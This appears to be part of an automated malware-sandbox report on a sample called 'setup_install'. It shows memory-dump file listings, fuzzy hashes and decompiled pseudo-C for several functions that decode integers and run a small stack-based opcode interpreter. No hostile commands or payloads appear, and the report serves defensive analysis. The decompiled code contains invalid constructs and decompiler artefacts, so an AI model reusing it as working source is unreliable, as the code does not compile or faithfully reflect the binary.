abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ecb6ecc1fa7f8abb45e78d216fa70fa52ac855e8d793840e4abc9e2e22c93761
Instruction ID: 32bf17ebdfbf46b69cb6a193bbb1ce5a264a8e50e0479976f361219fa0a77363
Opcode Fuzzy Hash: ecb6ecc1fa7f8abb45e78d216fa70fa52ac855e8d793840e4abc9e2e22c93761
Instruction Fuzzy Hash: 7921F7328092254AC7309E2AA08127BB39B6B92354F580D7FE550773D2D23EDD65D2DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040E540, Relevance: 19.6, APIs: 13, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E540(void* __ebx) {
				signed int _t29;
				signed int _t31;
				intOrPtr _t32;
				signed char* _t36;
				signed char _t39;
				signed int _t41;
				signed int _t42;
				signed char* _t45;
				signed int _t47;
				void* _t49;

				_t45 = 0;
				do {
					__ebx = __ebx + 1;
					 *(__ebx - 1) & 0x000000ff =  *(__ebx - 1) & 0x7f;
					__eax = ( *(__ebx - 1) & 0x7f) << __cl;
					__ecx = __ecx + 7;
					__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
				} while (__dl < 0);
				__edi = 0;
				__ecx = 0;
				do {
					__ebx = __ebx + 1;
					__eax =  *(__ebx - 1) & 0x000000ff;
					__ecx = __ecx + 7;
					__edi = __edi | ( *(__ebx - 1) & 0x7f) << __cl;
				} while (__al < 0);
				if(__ecx <= 0x1f && (__al & 0x00000040) != 0) {
					1 = 1 << __cl;
					__eax =  ~(1 << __cl);
					__edi = __edi |  ~(1 << __cl);
				}
				if (__esi - 0x11 > 0) goto 0x498c76;
				__ecx =  *((intOrPtr*)(__esp + 0x1c));
				__eax =  *(__ecx + __esi * 4);
				if(( *(__ecx + 0x63) & 0x00000040) == 0 ||  *((char*)(__ecx + __esi + 0x6c)) == 0) {
					if (__dl != 4) goto 0x498c76;
					__eax =  *__eax;
				}
				__edi = __edi + __eax;
				__esi = __ebx;
				while(1) {
					if (_t47 - 0x3f > 0) goto 0x498c76;
					 *(_t49 + 0x30 + _t47 * 4) = _t42;
					 *(_t49 + 0x14) = _t47 + 1;
					if( *((intOrPtr*)(_t49 + 0x18)) <= _t45) {
						break;
					}
					_t29 =  *_t45 & 0x000000ff;
					_t1 =  &(_t45[1]); // 0x1
					_t36 = _t1;
					_t39 = _t29 - 3;
					_t41 = _t29;
					if(_t39 > 0xee) {
						goto L16;
					} else {
						goto ( *((intOrPtr*)(0x4a4bd0 + (_t39 & 0x000000ff) * 4)));
					}
					do {
						goto L16;
						L19:
					} while (_t41 != 0x19);
					_t45 = _t36;
					_t42 = (_t42 ^ _t42 >> 0x0000001f) - (_t42 >> 0x1f);
					continue;
					L16:
					abort();
					if(_t41 != 6) {
						goto L19;
					} else {
						_t42 =  *_t42;
						_t45 = _t36;
						continue;
					}
					L22:
				}
				_t31 =  *(_t49 + 0x14);
				if (_t31 == 0) goto 0x498c76;
				_t32 =  *((intOrPtr*)(_t49 + 0x2c + _t31 * 4));
				return _t32;
				goto L22;
			}

0x0040e540
0x0040e544
0x0040e544
0x0040e54d
0x0040e550
0x0040e552
0x0040e555
0x0040e557
0x0040e55b
0x0040e55d
0x0040e560
0x0040e560
0x0040e563
0x0040e56e
0x0040e571
0x0040e573
0x0040e57a
0x0040e719
0x0040e71b
0x0040e71d
0x0040e71d
0x0040e587
0x0040e58d
0x0040e598
0x0040e59f
0x0040e5ab
0x0040e5b1
0x0040e5b1
0x0040e5b3
0x0040e5b9
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x0040e238
0x00000000
0x00000000
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x00000000
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26dfd1fdf5a014da34e41f68ea1b481708007e7cbcb9964241ba61c0ad44e187
Instruction ID: 029cab1a2c8ade43913864886e91fce918b02832fce1eb0847be0c4f763bdf30
Opcode Fuzzy Hash: 26dfd1fdf5a014da34e41f68ea1b481708007e7cbcb9964241ba61c0ad44e187
Instruction Fuzzy Hash: 9A0126F18042612BE7145A6AC851375AA925B8339CF084C7FEC62B77C2D53E8846922E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E389, Relevance: 19.6, APIs: 13, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E389(signed char* __eax, void* __ebx, void* __ecx) {
				signed int _t27;
				signed int _t29;
				intOrPtr _t30;
				signed char* _t34;
				signed char _t38;
				signed int _t40;
				signed int _t41;
				signed char* _t44;
				void* _t48;

				_t44 = __eax;
				do {
					__ebx = __ebx + 1;
					__eax =  *(__ebx - 1) & 0x000000ff;
					__ecx = __ecx + 7;
					__ebp = __ebp | (__eax & 0x0000007f) << __cl;
				} while (__al < 0);
				__edi = __eax;
				__eax = __esi;
				__esi = __edi;
				if(__ecx <= 0x1f && __esi != 0) {
					__ebp = __ebp |  ~(1 << __cl);
				}
				__eax = __eax - 0x70;
				if (__eax - 0x11 > 0) goto 0x498c76;
				__esi =  *(__esp + 0x1c);
				__edi =  *(__esi + __eax * 4);
				if(( *(__esi + 0x63) & 0x00000040) == 0 ||  *((char*)(__esi + __eax + 0x6c)) == 0) {
					if (__dl != 4) goto 0x498c76;
					__edi =  *__edi;
				}
				__edi = __edi + __ebp;
				__esi = __ebx;
				__ebp =  *(__esp + 0x14);
				while(1) {
					if (0 - 0x3f > 0) goto 0x498c76;
					 *(_t48 + 0x30) = _t41;
					 *(_t48 + 0x14) = 1;
					if( *((intOrPtr*)(_t48 + 0x18)) <= _t44) {
						break;
					}
					_t27 =  *_t44 & 0x000000ff;
					_t1 =  &(_t44[1]); // 0x1
					_t34 = _t1;
					_t38 = _t27 - 3;
					_t40 = _t27;
					if(_t38 > 0xee) {
						goto L14;
					} else {
						goto ( *((intOrPtr*)(0x4a4bd0 + (_t38 & 0x000000ff) * 4)));
					}
					do {
						goto L14;
						L17:
					} while (_t40 != 0x19);
					_t44 = _t34;
					_t41 = (_t41 ^ _t41 >> 0x0000001f) - (_t41 >> 0x1f);
					continue;
					L14:
					abort();
					if(_t40 != 6) {
						goto L17;
					} else {
						_t41 =  *_t41;
						_t44 = _t34;
						continue;
					}
					L20:
				}
				_t29 =  *(_t48 + 0x14);
				if (_t29 == 0) goto 0x498c76;
				_t30 =  *((intOrPtr*)(_t48 + 0x2c + _t29 * 4));
				return _t30;
				goto L20;
			}

0x0040e394
0x0040e3a0
0x0040e3a0
0x0040e3a3
0x0040e3ae
0x0040e3b1
0x0040e3b3
0x0040e3b7
0x0040e3b9
0x0040e3bb
0x0040e3c0
0x0040e72d
0x0040e72d
0x0040e3cb
0x0040e3d1
0x0040e3d7
0x0040e3e2
0x0040e3e9
0x0040e3f5
0x0040e3fb
0x0040e3fb
0x0040e3fd
0x0040e3ff
0x0040e401
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x0040e238
0x00000000
0x00000000
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x00000000
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6599ddcd00b53cdcb653e4f323ce8c967e675d5cd69eef0d1e9decc1316e828
Instruction ID: 6698a4361d85328b5617ba4148ee37299368e84bbe14a2becf09d49487ab1586
Opcode Fuzzy Hash: f6599ddcd00b53cdcb653e4f323ce8c967e675d5cd69eef0d1e9decc1316e828
Instruction Fuzzy Hash: CB0166728182244BD7205A298004376FBD2AB82398F5A886FDD4177782CA3CBC55A7CD

Uniqueness

Uniqueness Score: -1.00%

Function 0040E210, Relevance: 19.6, APIs: 13, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E210(void* __esi) {
				signed int _t17;
				signed int _t19;
				intOrPtr _t20;
				signed char* _t23;
				signed char _t25;
				signed int _t27;
				signed int _t28;
				signed char* _t32;
				signed int _t34;
				void* _t36;

				_t34 =  *(_t36 + 0x14);
				_t28 =  *(__esi + 1);
				_t32 = __esi + 5;
				while(1) {
					if (_t34 - 0x3f > 0) goto 0x498c76;
					 *(_t36 + 0x30 + _t34 * 4) = _t28;
					 *(_t36 + 0x14) = _t34 + 1;
					L4:
					if( *((intOrPtr*)(_t36 + 0x18)) > _t32) {
						_t17 =  *_t32 & 0x000000ff;
						_t3 =  &(_t32[1]); // 0x1
						_t23 = _t3;
						_t25 = _t17 - 3;
						_t27 = _t17;
						if(_t25 > 0xee) {
							goto L7;
						} else {
							goto ( *((intOrPtr*)(0x4a4bd0 + (_t25 & 0x000000ff) * 4)));
						}
						do {
							goto L7;
							L10:
						} while (_t27 != 0x19);
						_t32 = _t23;
						_t28 = (_t28 ^ _t28 >> 0x0000001f) - (_t28 >> 0x1f);
						while(1) {
							if (_t34 - 0x3f > 0) goto 0x498c76;
							 *(_t36 + 0x30 + _t34 * 4) = _t28;
							 *(_t36 + 0x14) = _t34 + 1;
							goto L4;
						}
						L7:
						abort();
						if(_t27 != 6) {
							goto L10;
						} else {
							_t28 =  *_t28;
							_t32 = _t23;
							continue;
						}
						L12:
					}
					_t19 =  *(_t36 + 0x14);
					if (_t19 == 0) goto 0x498c76;
					_t20 =  *((intOrPtr*)(_t36 + 0x2c + _t19 * 4));
					return _t20;
					goto L12;
				}
			}

0x0040e210
0x0040e214
0x0040e217
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x0040e234
0x0040e238
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x00000000
0x0040e230
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000
0x0040e254

APIs

abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ad4fbf4aa6f09041dcf4f24fe49b7cbd0bb2e0685c7ce13469d47c6a5e0727ea
Instruction ID: 31685426ebc3e45dbc2e4f0007f2337ee2c9f787c773dc0e21918fdcded83cf3
Opcode Fuzzy Hash: ad4fbf4aa6f09041dcf4f24fe49b7cbd0bb2e0685c7ce13469d47c6a5e0727ea
Instruction Fuzzy Hash: C7F086719052158BC710EF19E4401BAF3E5EF86748F000D2FF599A3261D339E558C69A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E331, Relevance: 19.6, APIs: 13, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E331(void* __ebx) {
				signed int _t27;
				signed int _t29;
				intOrPtr _t30;
				signed char* _t34;
				signed char _t37;
				signed int _t39;
				signed int _t40;
				signed char* _t43;
				signed int _t45;
				void* _t47;

				_t43 = 0;
				do {
					__ebx = __ebx + 1;
					__ecx = __ecx + 7;
					__esi = __esi | ( *(__ebx - 1) & 0x7f) << __cl;
				} while (__dl < 0);
				if (__esi - 0x11 > 0) goto 0x498c76;
				__ecx =  *((intOrPtr*)(__esp + 0x1c));
				__edi =  *((intOrPtr*)(__ecx + __esi * 4));
				if(( *(__ecx + 0x63) & 0x00000040) == 0 ||  *((char*)(__ecx + __esi + 0x6c)) == 0) {
					if (__al != 4) goto 0x498c76;
					__edi =  *__edi;
					__esi = __ebx;
					goto L3;
				} else {
					__esi = __ebx;
					while(1) {
						L3:
						if (_t45 - 0x3f > 0) goto 0x498c76;
						 *(_t47 + 0x30 + _t45 * 4) = _t40;
						 *(_t47 + 0x14) = _t45 + 1;
						L4:
						if( *((intOrPtr*)(_t47 + 0x18)) > _t43) {
							_t27 =  *_t43 & 0x000000ff;
							_t1 =  &(_t43[1]); // 0x1
							_t34 = _t1;
							_t37 = _t27 - 3;
							_t39 = _t27;
							if(_t37 > 0xee) {
								goto L13;
							} else {
								goto ( *((intOrPtr*)(0x4a4bd0 + (_t37 & 0x000000ff) * 4)));
							}
							do {
								goto L13;
								L16:
							} while (_t39 != 0x19);
							_t43 = _t34;
							_t40 = (_t40 ^ _t40 >> 0x0000001f) - (_t40 >> 0x1f);
							while(1) {
								L3:
								if (_t45 - 0x3f > 0) goto 0x498c76;
								 *(_t47 + 0x30 + _t45 * 4) = _t40;
								 *(_t47 + 0x14) = _t45 + 1;
								goto L4;
							}
							L13:
							abort();
							if(_t39 != 6) {
								goto L16;
							} else {
								_t40 =  *_t40;
								_t43 = _t34;
								continue;
							}
							goto L18;
						}
						_t29 =  *(_t47 + 0x14);
						if (_t29 == 0) goto 0x498c76;
						_t30 =  *((intOrPtr*)(_t47 + 0x2c + _t29 * 4));
						return _t30;
						goto L18;
					}
				}
				L18:
			}

0x0040e331
0x0040e335
0x0040e335
0x0040e343
0x0040e346
0x0040e348
0x0040e34f
0x0040e355
0x0040e360
0x0040e367
0x0040e376
0x0040e37c
0x0040e382
0x00000000
0x0040e6a0
0x0040e6a4
0x0040e220
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x0040e234
0x0040e238
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x0040e220
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x00000000
0x0040e230
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000
0x0040e254
0x0040e220
0x00000000

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58f6f88fedb5d3dba524c67324819dc869493576ce658bfc844b97562bd30bbb
Instruction ID: eed6807ac9e1bfbdc7414cd968167801644d82c6bc7f0284b944c82d77db7966
Opcode Fuzzy Hash: 58f6f88fedb5d3dba524c67324819dc869493576ce658bfc844b97562bd30bbb
Instruction Fuzzy Hash: 8EF022B1C082605BD3209F15C050235BAA15B8339CF5808AFECA137393C23EEC16D6AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040E410, Relevance: 19.5, APIs: 13, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E410(void* __eax) {
				signed int _t34;
				signed int _t36;
				signed int _t39;
				intOrPtr _t40;
				void* _t41;
				signed char* _t43;
				signed char* _t44;
				signed char _t46;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				signed int _t52;
				signed char* _t55;
				signed int _t57;
				void* _t59;

				_t34 = __eax - 0x50;
				if (_t34 - 0x11 > 0) goto 0x498c76;
				_t55 =  *(_t59 + 0x1c);
				_t49 =  *(_t34 + 0x4e64d8) & 0x000000ff;
				_t52 =  *(_t55 + _t34 * 4);
				if((_t55[0x63] & 0x00000040) == 0 ||  *((char*)(__esi + __eax + 0x6c)) == 0) {
					if(_t49 == 4) {
						_t52 =  *_t52;
						_t57 =  *(_t59 + 0x14);
						_t55 = _t43;
					} else {
						_t57 =  *(_t59 + 0x14);
						_t48 = _t55[1] & 0x000000ff;
						_t41 = _t57 - 1;
						if (_t48 - _t41 >= 0) goto 0x498c76;
						_t55 =  &(_t55[2]);
						_t52 =  *(_t59 + 0x30 + (_t41 - _t48) * 4);
					}
				} else {
					__esi = __ebx;
					while(1) {
						L3:
						if (_t57 - 0x3f > 0) goto 0x498c76;
						 *(_t59 + 0x30 + _t57 * 4) = _t52;
						 *(_t59 + 0x14) = _t57 + 1;
						L4:
						if( *((intOrPtr*)(_t59 + 0x18)) > _t55) {
							_t36 =  *_t55 & 0x000000ff;
							_t8 =  &(_t55[1]); // 0x1
							_t44 = _t8;
							_t46 = _t36 - 3;
							_t50 = _t36;
							if(_t46 > 0xee) {
								goto L13;
							} else {
								goto ( *((intOrPtr*)(0x4a4bd0 + (_t46 & 0x000000ff) * 4)));
							}
							do {
								goto L13;
								L16:
							} while (_t50 != 0x19);
							_t55 = _t44;
							_t52 = (_t52 ^ _t52 >> 0x0000001f) - (_t52 >> 0x1f);
							while(1) {
								L3:
								if (_t57 - 0x3f > 0) goto 0x498c76;
								 *(_t59 + 0x30 + _t57 * 4) = _t52;
								 *(_t59 + 0x14) = _t57 + 1;
								goto L4;
							}
							L13:
							abort();
							if(_t50 != 6) {
								goto L16;
							} else {
								_t52 =  *_t52;
								_t55 = _t44;
								continue;
							}
							L18:
						}
						_t39 =  *(_t59 + 0x14);
						if (_t39 == 0) goto 0x498c76;
						_t40 =  *((intOrPtr*)(_t59 + 0x2c + _t39 * 4));
						return _t40;
						goto L18;
					}
				}
				goto L3;
			}

0x0040e410
0x0040e416
0x0040e41c
0x0040e420
0x0040e427
0x0040e42e
0x0040e43e
0x0040e37c
0x0040e37e
0x0040e382
0x0040e444
0x0040e450
0x0040e454
0x0040e45b
0x0040e460
0x0040e468
0x0040e46a
0x0040e46a
0x0040e6a0
0x0040e6a4
0x0040e220
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x0040e234
0x0040e238
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x0040e220
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x00000000
0x0040e230
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254
0x00000000
0x0040e254
0x0040e220
0x00000000

APIs

abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB0
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CB5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 8f11681bca5f1eab7e4bed7b95b495b670467fd5305df84650d7e50e9d4a97d1
Instruction ID: 3596ea984c08e0ef5c32edb3d5266436aa9ddbeaf624a7c84d2e7bfbe652f214
Opcode Fuzzy Hash: 8f11681bca5f1eab7e4bed7b95b495b670467fd5305df84650d7e50e9d4a97d1
Instruction Fuzzy Hash: 1FF0E2B08092054AD7209F258144235BAE56B83398F981C6FED80333A3823CEC64CAAF

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5C0, Relevance: 19.5, APIs: 13, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E5C0(signed char* __esi) {
				signed int _t22;
				signed int _t23;
				signed char* _t24;
				signed int _t25;
				signed int _t27;
				intOrPtr _t28;
				signed char* _t31;
				signed char _t33;
				signed int _t36;
				signed int _t37;
				signed char* _t40;
				signed int _t42;
				void* _t44;

				_t40 = __esi;
				_t22 =  *(_t44 + 0x14);
				if (_t22 == 0) goto 0x498c76;
				_t23 = _t22 - 1;
				_t37 = _t23;
				 *(_t44 + 0x14) = _t23;
				_t24 =  &(__esi[3]);
				if( *((intOrPtr*)(_t44 + 0x30 + _t37 * 4)) == 0) {
					_t40 = _t24;
				} else {
					__esi = __esi + __eax;
				}
				while( *((intOrPtr*)(_t44 + 0x18)) > _t40) {
					_t25 =  *_t40 & 0x000000ff;
					_t7 =  &(_t40[1]); // 0x1
					_t31 = _t7;
					_t33 = _t25 - 3;
					_t36 = _t25;
					if(_t33 > 0xee) {
						goto L8;
					} else {
						goto ( *((intOrPtr*)(0x4a4bd0 + (_t33 & 0x000000ff) * 4)));
					}
					do {
						goto L8;
						L11:
					} while (_t36 != 0x19);
					_t40 = _t31;
					_t37 = (_t37 ^ _t37 >> 0x0000001f) - (_t37 >> 0x1f);
					L3:
					if (_t42 - 0x3f > 0) goto 0x498c76;
					 *(_t44 + 0x30 + _t42 * 4) = _t37;
					 *(_t44 + 0x14) = _t42 + 1;
					continue;
					L8:
					abort();
					if(_t36 != 6) {
						goto L11;
					} else {
						_t37 =  *_t37;
						_t40 = _t31;
						goto L3;
					}
					break;
				}
				_t27 =  *(_t44 + 0x14);
				if (_t27 == 0) goto 0x498c76;
				_t28 =  *((intOrPtr*)(_t44 + 0x2c + _t27 * 4));
				return _t28;
			}

0x0040e5c0
0x0040e5c0
0x0040e5c6
0x0040e5cc
0x0040e5cf
0x0040e5d1
0x0040e5d5
0x0040e5de
0x0040e6e5
0x0040e5e4
0x0040e5e8
0x0040e5e8
0x0040e234
0x0040e1f0
0x0040e1f3
0x0040e1f3
0x0040e1f6
0x0040e1f9
0x0040e1fe
0x00000000
0x0040e204
0x0040e207
0x0040e207
0x0040e6b9
0x00000000
0x0040e6d0
0x0040e6d0
0x0040e6d7
0x0040e6de
0x0040e220
0x0040e223
0x0040e22c
0x0040e230
0x00000000
0x0040e6b9
0x0040e6b9
0x0040e6c3
0x00000000
0x0040e6c5
0x0040e6c5
0x0040e6c7
0x00000000
0x0040e6c7
0x00000000
0x0040e6c3
0x0040e23a
0x0040e240
0x0040e246
0x0040e254

APIs

abort.MSVCRT ref: 00498C76
abort.MSVCRT ref: 00498C7B
abort.MSVCRT ref: 00498C80
abort.MSVCRT(0040F34B), ref: 00498C85
abort.MSVCRT(0040F34B), ref: 00498C8A
abort.MSVCRT(0040F34B), ref: 00498C8F
abort.MSVCRT(0040F34B), ref: 00498C94
abort.MSVCRT(0040F34B), ref: 00498C99
abort.MSVCRT(0040F34B), ref: 00498C9E
abort.MSVCRT(0040F34B), ref: 00498CA3
abort.MSVCRT(?,?,20247C8B,?,0041C520,474E5543,0040FB3E), ref: 00498CA8
